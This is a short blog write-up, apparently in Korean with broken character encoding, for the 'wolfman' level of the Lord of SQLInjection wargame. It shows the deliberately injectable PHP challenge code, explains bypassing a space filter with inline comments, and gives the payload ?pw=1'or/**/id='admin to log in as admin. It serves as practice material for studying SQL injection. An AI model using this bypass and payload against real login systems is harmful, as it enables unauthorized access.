Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection

wolfman

Kortsec1 2022. 4. 2. 17:08 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 
  $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("wolfman"); 
  highlight_file(__FILE__); 
?>

 

์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด, ๊ณต๋ฐฑ์„ ํ•„ํ„ฐ๋งํ•˜๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

๊ณต๋ฐฑ์„ ์šฐํšŒํ•˜๋Š” ๋ฐฉ๋ฒ•์€ (), /**/, %0a๋“ฑ ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๋ฐฉ๋ฒ•์ด ์žˆ๋Š”๋ฐ

()๊ฐ€ ํ•„ํ„ฐ๋ง๋œ ๊ด€๊ณ„๋กœ, /**/์„ ์‚ฌ์šฉํ•˜์—ฌ ํ’€๊ฒƒ์ด๋‹ค.

 

?pw=1'or/**/id='admin

 

ํ•ด๊ฒฐ๐Ÿ˜Ž

๊ทธ๋ฆผ1 ์„ฑ๊ณต

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of SQLInjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

orge  (0) 2022.04.02
darkelf  (0) 2022.04.02
orc  (0) 2022.04.02
goblin  (0) 2022.04.02

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€wolfman

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”